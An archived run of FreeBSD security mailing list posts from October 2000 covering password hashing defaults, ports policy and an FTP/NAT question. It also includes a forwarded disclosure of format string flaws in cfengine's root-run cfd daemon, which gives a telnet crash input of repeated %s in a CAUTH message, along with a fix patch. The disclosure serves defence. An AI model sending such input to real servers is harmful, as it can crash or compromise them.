freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D474937B503; Sun, 1 Oct 2000 14:33:25 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA49537; Sun, 1 Oct 2000 14:33:25 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Sun, 1 Oct 2000 14:33:25 -0700 From: Kris Kennaway To: achilov@granch.ru Cc: "Vladimir B. Grebenschikov" , freebsd-security@FreeBSD.ORG Subject: Re: MD5 passwords vs DES Message-ID: <20001001143325.A44714@freefall.freebsd.org> References: <14789.42660.401430.305445@vbook.express.ru> <39D79CF0.D794F732@sentry.granch.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39D79CF0.D794F732@sentry.granch.ru>; from shelton@sentry.granch.ru on Mon, Oct 02, 2000 at 03:22:08AM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 02, 2000 at 03:22:08AM +0700, Rashid N. Achilov wrote: > "Vladimir B. Grebenschikov" wrote: > > > > I have a question: > > > > Do anybody have ideas to add 'default crypting mode' for utilities > > like passwd, adduser, etc ? > > > > Manually change for all users passwords to MD5, than simply edit symlink > libcrypt.so.2 (I assume 4.1-RELEASE) to point to a libscrypt.so.2 and > libcrypt.a to point to a libscrypt.a. Now you can't use DES passwords > until revert back links, but all created users now will have MD5-crypted > passwords This is no longer true as of 4.1.1-RELEASE, although it wasn't documented there. Basically, you control which form users in a particular login class get with the passwd_format login capability, which takes values of "des" or "md5". This is documented in login_cap(5) in recent 4.1.1-STABLE, and I think Brian was going to add an erratum about it. Of course, you still need to install des-capable libraries to enable des passwords (as before), but it won't magically change the default password format. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 14:40:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D009137B503; Sun, 1 Oct 2000 14:40:20 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA52808; Sun, 1 Oct 2000 14:40:20 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Sun, 1 Oct 2000 14:40:20 -0700 From: Kris Kennaway To: Andreas Alderud Cc: security@FreeBSD.ORG Subject: Re: Security and FreeBSD, my overall perspective Message-ID: <20001001144020.B44714@freefall.freebsd.org> References: <002401c02b99$a07a8ab0$6400a8c0@XGod> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <002401c02b99$a07a8ab0$6400a8c0@XGod>; from aaldv97@student.vxu.se on Sun, Oct 01, 2000 at 01:20:38PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 01, 2000 at 01:20:38PM +0200, Andreas Alderud wrote: > I think it would be wise to have three ports of the ``same´´ package. > My idea is to have lets say -SECURE, -STABLE - and CURRENT (the same could > be done with FreeBSD itself). I don't understand what you're trying to say here. The ports collection isn't branched into -stable and -current versions, and I don't see any real benefits to doing that. It should work the same with both. > The real advantage of this would be if the BSDs would have a unified ports > system, as proposed by Chris Coleman, and incorperate the ideas of Jordans > paper on the future package system. [...] This doesn't sound relevant to the current FreeBSD ports collection - if OpenPackages want to stratify their ports collection, they can do what they like :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 15: 3:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 0479937B503; Sun, 1 Oct 2000 15:03:13 -0700 (PDT) Received: from localhost (hu0wi9@localhost [127.0.0.1] (may be forged)) by green.dyndns.org (8.11.0/8.11.0) with ESMTP id e91LsB550028; Sun, 1 Oct 2000 17:56:10 -0400 (EDT) (envelope-from green@FreeBSD.org) Message-Id: <200010012156.e91LsB550028@green.dyndns.org> X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 To: achilov@granch.ru Cc: "Vladimir B. Grebenschikov" , freebsd-security@FreeBSD.org Subject: Re: MD5 passwords vs DES In-Reply-To: Message from "Rashid N. Achilov" of "Mon, 02 Oct 2000 03:22:08 +0700." <39D79CF0.D794F732@sentry.granch.ru> From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 01 Oct 2000 17:54:10 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rashid N. Achilov" wrote: > "Vladimir B. Grebenschikov" wrote: > > > > I have a question: > > > > Do anybody have ideas to add 'default crypting mode' for utilities > > like passwd, adduser, etc ? > > > > Manually change for all users passwords to MD5, than simply edit symlink > libcrypt.so.2 (I assume 4.1-RELEASE) to point to a libscrypt.so.2 and > libcrypt.a to point to a libscrypt.a. Now you can't use DES passwords > until revert back links, but all created users now will have MD5-crypted > passwords Nah, the functionality's already there. Your passwords will default to md5, or whatever is specified in /etc/login.conf as passwd_format. This is 4.1.1-RELEASE and onward. -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 18:38:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp6.mindspring.com (smtp6.mindspring.com [207.69.200.110]) by hub.freebsd.org (Postfix) with ESMTP id E2E3E37B503 for ; Sun, 1 Oct 2000 18:38:32 -0700 (PDT) Received: from p4f0i0 (user-2iniio2.dialup.mindspring.com [165.121.75.2]) by smtp6.mindspring.com (8.9.3/8.8.5) with SMTP id VAA05416 for ; Sun, 1 Oct 2000 21:38:31 -0400 (EDT) Message-ID: <003801c02c11$924d9cc0$024b79a5@p4f0i0> From: "Jonathan M. Slivko" To: Subject: Finally, silence! Date: Sun, 1 Oct 2000 21:39:13 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0035_01C02BF0.0A6AF120" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0035_01C02BF0.0A6AF120 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Finally, there is some silence on the list. Thank God! ;) -------------------------------------------------------------------------= --- Jonathan M. Slivko, President / Founder Linux Mafia Internet Services=20 Phone: (212) 663-1109 / Pager: (917) 388-5304 Webpage: http://www.linux-mafia.net AIM SN: OptixNYC Network Solutions Handle: JSR730 -------------------------------------------------------------------------= --- ------=_NextPart_000_0035_01C02BF0.0A6AF120 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Finally, there is some silence on the = list. Thank=20 God! ;)
 
----------------------------------------------------------------= ------------
Jonathan=20 M. Slivko, President / Founder
Linux Mafia Internet Services =
Phone: (212)=20 663-1109 / Pager: (917) 388-5304
Webpage: http://www.linux-mafia.net
&nb= sp;AIM=20 SN: OptixNYC
Network Solutions Handle:=20 JSR730
---------------------------------------------------------------= -------------
------=_NextPart_000_0035_01C02BF0.0A6AF120-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 21:28:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 4B66E37B503; Sun, 1 Oct 2000 21:28:43 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 1 Oct 2000 21:25:13 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e924QJ959567; Sun, 1 Oct 2000 21:26:19 -0700 (PDT) (envelope-from cjc) Date: Sun, 1 Oct 2000 21:26:18 -0700 From: "Crist J . Clark" To: Kris Kennaway Cc: achilov@granch.ru, "Vladimir B. Grebenschikov" , freebsd-security@FreeBSD.ORG Subject: Re: MD5 passwords vs DES Message-ID: <20001001212618.M25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <14789.42660.401430.305445@vbook.express.ru> <39D79CF0.D794F732@sentry.granch.ru> <20001001143325.A44714@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001001143325.A44714@freefall.freebsd.org>; from kris@FreeBSD.ORG on Sun, Oct 01, 2000 at 02:33:25PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 01, 2000 at 02:33:25PM -0700, Kris Kennaway wrote: [snip] > This is documented in login_cap(5) in recent > 4.1.1-STABLE... Whoa, whoa. Please, tell me there is no such thing as 4.1.1-STABLE. ITYM, 4.1-STABLE after the freeze of 4.1.1-RELEASE, Kris? I don't believe there are, and there better not be, separate 4.1-STABLE and 4.1.1-STABLE branches. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 21:30:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 72E2237B502; Sun, 1 Oct 2000 21:30:35 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA42981; Sun, 1 Oct 2000 21:30:35 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Sun, 1 Oct 2000 21:30:35 -0700 From: Kris Kennaway To: cjclark@alum.mit.edu Cc: Kris Kennaway , achilov@granch.ru, "Vladimir B. Grebenschikov" , freebsd-security@FreeBSD.ORG Subject: Re: MD5 passwords vs DES Message-ID: <20001001213034.A42302@freefall.freebsd.org> References: <14789.42660.401430.305445@vbook.express.ru> <39D79CF0.D794F732@sentry.granch.ru> <20001001143325.A44714@freefall.freebsd.org> <20001001212618.M25121@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001001212618.M25121@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Sun, Oct 01, 2000 at 09:26:18PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 01, 2000 at 09:26:18PM -0700, Crist J . Clark wrote: > On Sun, Oct 01, 2000 at 02:33:25PM -0700, Kris Kennaway wrote: > > [snip] > > > This is documented in login_cap(5) in recent > > 4.1.1-STABLE... > > Whoa, whoa. Please, tell me there is no such thing as 4.1.1-STABLE. > > ITYM, 4.1-STABLE after the freeze of 4.1.1-RELEASE, Kris? I don't > believe there are, and there better not be, separate 4.1-STABLE and > 4.1.1-STABLE branches. 4.1.1-STABLE means "the RELENG_4 branch after the release of the 4.1.1-RELEASE snapshot". Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 23:58:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from netcore.fi (netcore.fi [193.94.160.1]) by hub.freebsd.org (Postfix) with ESMTP id 79E7C37B503 for ; Sun, 1 Oct 2000 23:58:39 -0700 (PDT) Received: from localhost (pekkas@localhost) by netcore.fi (8.11.0/8.11.0) with ESMTP id e926wVQ14145 for ; Mon, 2 Oct 2000 09:58:33 +0300 Date: Mon, 2 Oct 2000 09:58:31 +0300 (EEST) From: Pekka Savola To: security@freebsd.org Subject: Very probable remote root vulnerability in cfengine (fwd) Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/Mixed; BOUNDARY="1589707168-1171649858-970422716=:9658" Content-ID: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1589707168-1171649858-970422716=:9658 Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-1 Content-Transfer-Encoding: 8BIT Content-ID: Hi, I was unable to reproduce this in FreeBSD (ports cfengine), but you might still want to take a look -- I find it probable this may be exploitable some other way. -- Pekka Savola "Tell me of difficulties surmounted, Pekka.Savola@netcore.fi not those you stumble over and fall" ---------- Forwarded message ---------- Date: Mon, 2 Oct 2000 09:56:30 +0300 (EEST) From: Pekka Savola To: bugtraq@securityfocus.com Subject: Very probable remote root vulnerability in cfengine PROBLEM: -------- cfd daemon in GNU CFEngine ( http://www.iu.hioslo.no/cfengine/ ) contains several format string vulnerabilities in syslog() calls. Everyone, or if access controls are being used, accepted hosts, can inject the network daemon with a message causing segmentation fault. As cfd is almost always run as root due to it's nature (centralized configuration management etc.), this can be quite lethal and lead into a root compromise. AUTHOR INTERACTION: ------------------- Notified the author on 1st Oct 2000 and worked with him. Different fix was applied to the newly released 1.6.0.a11 (alpha version). I got the impression that there isn't going to be an official fix for 1.5.x releases. VERSIONS AND PLATFORMS AFFECTED: -------------------------------- Every recent version except 1.6.0a11 released on 1st Oct 2000. 1.5.x and 1.6.0a10 were tested on Red Hat Linux; however, this is not part of Red Hat Linux or Powertools. Debian, at least, includes cfengine as a package. I briefly tried to reproduce this on FreeBSD 3.4 or 4.1 -- no luck; I wouldn't be surprised if it was exploitable some way or the other though. Not tested on other non-Linux platforms, but if you run cfd I suggest you check it out no matter the platform. DETAILS: -------- If access controls are used (this is not the default) in cfd.conf or equivalent, the attacker must have access to an allowed system first. Spoofing would probably also yield similar results; the fact that there doesn't need not to be any reply from the server makes it easier. Segmentation fault can be induced as follows: ----- $ telnet cfdserver 5308 Trying x.y.z.w... Connected to cfdserver.some.domain. Escape character is '^]'. CAUTH 1.1.1.1 myhostname root %s%s%s%s%s%s%s%s ^] telnet> quit Connection closed. ----- where 1.1.1.1 is your IP address and myhostname is some resolvable hostname. A longer string of %s's can also be used if that doesn't produce good results. If the %s string is not long enough, string like the following will be syslogged; this doesn't look good: ----- cfdserver cfd[11330]: Reverse hostname lookup failed, host claiming to be 1.1.1.1 myhostname root cfdserver.some.domain(null)1.1.1.1 nev^M was 1.1.1.1 s%s%s^M ^Aû½^QÀØÀôü¿0¼^D^HÀj ^Húì¿^Hý¿Àj ----- In the end, cfd dies in a segmentation fault. As you can set %s%s%s freely, and it's passed almost without checking as-is to syslog(), it shouldn't be too difficult for Joe Hacker to exploit this. Also, other components of cfengine use the same logging functions, so a local root exploit could also be possible but those aren't as interesting as this and will be fixed at the same time. EXPLOIT: -------- Not my business; I'm sure someone will produce one sooner or later though. WORKAROUND: ----------- Enable access controls in cfd.conf and/or firewall off TCP port 5308. These can't be considered _good_ workarounds as users in the local network/legit hosts can still exploit the service. PATCH: ------ "Standard" patch to syslog calls included. It applies quite cleanly to both 1.5.x and 1.6.0aXX. CREDITS: -------- The vulnerability was found by Pekka Savola while doing a minor audit on cfengine in the light of format string vulnerabilities. -- Pekka Savola "Tell me of difficulties surmounted, Pekka.Savola@netcore.fi not those you stumble over and fall" --1589707168-1171649858-970422716=:9658 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="cfengine-1.6.0.a10-syslog.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: ATTACHMENT; FILENAME="cfengine-1.6.0.a10-syslog.patch" ZGlmZiAtdU5yIGNmZW5naW5lLTEuNi4wLmExMC5vcmlnL3NyYy9sb2cuYyBj ZmVuZ2luZS0xLjYuMC5hMTAvc3JjL2xvZy5jDQotLS0gY2ZlbmdpbmUtMS42 LjAuYTEwLm9yaWcvc3JjL2xvZy5jCVdlZCBTZXAgIDYgMTQ6NDM6MDMgMjAw MA0KKysrIGNmZW5naW5lLTEuNi4wLmExMC9zcmMvbG9nLmMJU3VuIE9jdCAg MSAyMDowOTowOSAyMDAwDQpAQCAtNzEsMTIgKzcxLDEyIEBADQogCQkgICAg IA0KIAkJICAgICBpZiAoTE9HR0lORyAmJiBJc1ByaXZpbGVnZWQoKSkNCiAJ CQl7DQotCQkJc3lzbG9nKExPR19FUlIsc3RyaW5nLFZGUU5BTUUpOw0KKwkJ CXN5c2xvZyhMT0dfRVJSLCIlcyIsc3RyaW5nLFZGUU5BTUUpOw0KIA0KIAkJ CWlmIChzdHJsZW4oZXJyc3RyKSAhPSAwKQ0KIAkJCSAgIHsNCi0JCQkgICBz eXNsb2coTE9HX0VSUixlcnJzdHIsVkZRTkFNRSk7DQotCQkJICAgc3lzbG9n KExPR19FUlIsc3RyZXJyb3IoZXJybm8pLFZGUU5BTUUpOw0KKwkJCSAgIHN5 c2xvZyhMT0dfRVJSLCIlcyIsZXJyc3RyLFZGUU5BTUUpOw0KKwkJCSAgIHN5 c2xvZyhMT0dfRVJSLCIlcyIsc3RyZXJyb3IoZXJybm8pLFZGUU5BTUUpOw0K IAkJCSAgIH0NCiAJCQl9DQogICAgICAgICAgICAgICAgICAgICAgYnJlYWs7 DQpAQCAtMTEwLDExICsxMTAsMTEgQEANCiAgICBjYXNlIGNmbG9nb25seToN CiAgICAgICAgICAgICAgICAgICAgICBpZiAoTE9HR0lORyAmJiBJc1ByaXZp bGVnZWQoKSkNCiAJCQl7DQotCQkJc3lzbG9nKExPR19JTkZPLHN0cmluZyxW RlFOQU1FKTsNCisJCQlzeXNsb2coTE9HX0lORk8sIiVzIixzdHJpbmcsVkZR TkFNRSk7DQogCQkJDQogCQkJaWYgKChlcnJzdHIgPT0gTlVMTCkgfHwgKHN0 cmxlbihlcnJzdHIpID4gMCkpDQogCQkJICAgew0KLQkJCSAgIHN5c2xvZyhM T0dfRVJSLGVycnN0cixWRlFOQU1FKTsNCisJCQkgICBzeXNsb2coTE9HX0VS UiwiJXMiLGVycnN0cixWRlFOQU1FKTsNCiAJCQkgICB9DQogCQkJfQ0KIAkJ ICAgICANCkBAIC0xMjUsNyArMTI1LDcgQEANCiANCiAJCSAgICAgaWYgKExP R0dJTkcgJiYgSXNQcml2aWxlZ2VkKCkpDQogCQkJew0KLQkJCXN5c2xvZyhM T0dfRVJSLHN0cmluZyxWRlFOQU1FKTsNCisJCQlzeXNsb2coTE9HX0VSUiwi JXMiLHN0cmluZyxWRlFOQU1FKTsNCiAJCQl9DQogIA0KIAkJICAgICBpZiAo c3RyaW5nW3N0cmxlbihzdHJpbmcpLTFdICE9ICdcbicpDQpAQCAtMTQxLDgg KzE0MSw4IEBADQogCQkJDQogCQkJaWYgKExPR0dJTkcgJiYgSXNQcml2aWxl Z2VkKCkpDQogCQkJICAgew0KLQkJCSAgIHN5c2xvZyhMT0dfRVJSLGVycnN0 cixWRlFOQU1FKTsNCi0JCQkgICBzeXNsb2coTE9HX0VSUixzdHJlcnJvcihl cnJubyksVkZRTkFNRSk7DQorCQkJICAgc3lzbG9nKExPR19FUlIsIiVzIixl cnJzdHIsVkZRTkFNRSk7DQorCQkJICAgc3lzbG9nKExPR19FUlIsIiVzIixz dHJlcnJvcihlcnJubyksVkZRTkFNRSk7DQogCQkJICAgfQ0KICAgICAgICAg ICAgICAgICAgICAgICAgIH0NCiAJCSAgICAgcmV0dXJuOw0K --1589707168-1171649858-970422716=:9658-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 0: 7:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id 0BD2337B503 for ; Mon, 2 Oct 2000 00:07:29 -0700 (PDT) Received: from XGod ([194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G1SJSF00.L7Z for ; Mon, 2 Oct 2000 09:07:27 +0200 Message-ID: <001101c02c3f$754a76b0$6400a8c0@XGod> From: "Andreas Alderud" To: Subject: Re: Security and FreeBSD, my overall perspective Date: Mon, 2 Oct 2000 09:07:42 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: >> I think it would be wise to have three ports of the ``same´´ package. >> My idea is to have lets say -SECURE, -STABLE - and CURRENT (the same could >> be done with FreeBSD itself). > >I don't understand what you're trying to say here. The ports >collection isn't branched into -stable and -current versions, and I >don't see any real benefits to doing that. It should work the same with both. I know, but that was not what I ment. I want ported application, where possible and/or needed, to have -SECURE, -STABLE - and -CURRENT version tag. Some people don't want to run the current of the software, they want to build and run the latest stable version, but in most cases it is no longer availbe, like with the Blackbox WM port for example. The latest stable verion of Blackbox is 0.51.3.1 but the only version available in FreeBSD 4.1.1 is 0.61.0. If we stretch this argument further, I as an OpenBSD user, like the fact that in the version I run, i.e. 2.6, they still use bind4 because it's not only proven stable, but also secure. Therefor it should be possible to have a, quite a bit larger tree of ports, without almost any extra work, that pleases everybody from security freaks to people who like to stand firmly on the ground but be quite up to date, and the people who like to live on the bleeding edge. I'm sure this could be done with FreeBSD itself, once a -SECURE version, of lets say 4.1.1, is available it would only be updated for security fixes not the feature patches that the -STABLE version now enjoys. Same thing here, wouldn't take that much extra effort. >> The real advantage of this would be if the BSDs would have a unified ports >> system, as proposed by Chris Coleman, and incorperate the ideas of Jordans >> paper on the future package system. [...] > >This doesn't sound relevant to the current FreeBSD ports collection - >if OpenPackages want to stratify their ports collection, they can do >what they like :-) Yep, but it's time to update to package system. http://people.freebsd.org/~jkh/package-and-install.txt /Kind regards, David A. Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 10:17:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [216.6.69.11]) by hub.freebsd.org (Postfix) with ESMTP id ECE4A37B66E for ; Mon, 2 Oct 2000 10:14:49 -0700 (PDT) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id e92HIvh84928 for ; Mon, 2 Oct 2000 12:18:58 -0500 (COT) Date: Mon, 2 Oct 2000 12:18:57 -0500 (COT) From: Buliwyf McGraw To: security@FreeBSD.ORG Subject: NATD and ipf Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello... i have a question for you: When im doing NATD for an intranet, using ipf and ipnat... i might use special rules for the ftp service??? I mean, from my subnet with invalid IP i can access all services from Internet; everything BUT not ftp. Why it could be??? Thanks to any help. ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 10:46:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 4185A37B502; Mon, 2 Oct 2000 10:46:10 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id NAA239228; Mon, 2 Oct 2000 13:45:48 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <200009302123.PAA13609@harmony.village.org> References: <008b01c02a71$6b8938c0$d04379a5@p4f0i0> <200009292349.TAA07263@giganda.komkon.org> <200009302123.PAA13609@harmony.village.org> Date: Mon, 2 Oct 2000 13:45:46 -0400 To: Warner Losh , "Jonathan M. Slivko" From: Garance A Drosihn Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd) Cc: "Igor Roshchin" , kris@FreeBSD.ORG, roman@xpert.com, security@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 3:23 PM -0600 9/30/00, Warner Losh wrote: > "Jonathan M. Slivko" writes: >: it. Especially some of the addons are extemely helpful. If you ask >: my opinion, let pine stay in it's normal state and leave the security >: and the managment of the machines that run it to the systems >: administrators, where the responsibilities lie in the first place. >: Doesn't everyone agree with me on that? > >I think I disagree. I do think pine should be in a "different state" of some sort, given that we are very suspicious about the code. >Maybe we need a category that is "This program may be insecure, set >INSECURE_OK in your /etc/make.conf if you don't have a problem with >that" for ports. I would suggest that some per-port switch might be better, so one can say "Yes, my users pretty much force me to have 'pine' available", without that also changing the status for all other ports which would be in this category. disclaimer: I'm not offering to do any work, of course, I'm just suggesting things for whoever IS willing to do the work... :-) --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11: 8:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id A79EA37B502 for ; Mon, 2 Oct 2000 11:03:47 -0700 (PDT) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id RAA04978; Mon, 2 Oct 2000 17:59:21 GMT Message-ID: <39D8CCF8.85E7C655@algroup.co.uk> Date: Mon, 02 Oct 2000 18:59:20 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.72 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Buliwyf McGraw Cc: security@FreeBSD.ORG Subject: Re: NATD and ipf References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Buliwyf McGraw wrote: > > Hello... i have a question for you: > > When im doing NATD for an intranet, using ipf and ipnat... i might use > special rules for the ftp service??? > I mean, from my subnet with invalid IP i can access all services from > Internet; everything BUT not ftp. > Why it could be??? you need to run your ftp client in passive mode. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:10:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id AEAD537B66C for ; Mon, 2 Oct 2000 11:10:04 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92IA2I03473; Mon, 2 Oct 2000 12:10:03 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA13194; Mon, 2 Oct 2000 12:10:02 -0600 (MDT) Message-Id: <200010021810.MAA13194@harmony.village.org> To: Garance A Drosihn Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd) Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 13:45:46 EDT." References: <008b01c02a71$6b8938c0$d04379a5@p4f0i0> <200009292349.TAA07263@giganda.komkon.org> <200009302123.PAA13609@harmony.village.org> Date: Mon, 02 Oct 2000 12:10:02 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Garance A Drosihn writes: : disclaimer: I'm not offering to do any work, of course, I'm just : suggesting things for whoever IS willing to do the work... :-) OK. I think that this is 20 lines of code in bsd.port.mk, the question is which 20 lines[*]. No matter what I'd do, you could override it on a per port basis (eg, I don't want any ports that are more dangerous than X, but please let me install pine or sendmail or netcat or xlock or zip anyway). The question is how to do this. Do we want to have this enshrined in /etc/make.conf (or more generally the global build environment)? Or do we want this handled like things are now in the local build environment to the individual port. A global solution would look like: OVERRIDE_SECURITY_CHECKS="mail/pine archivers/zip astro/xearth" and that way you don't have to remember each time you build the port. A local solution would look like: cd /usr/ports/cad/felt make OVERRIDE_SECURITY_CHECKS=yes install clean Note, OVERRIDE_SECURITY_CHECKS is likely a bad name, but it illistrates the question I'm trying to get answered. Warner [*] "The trouble so of two people didn't amount to a hill of beans in this world. 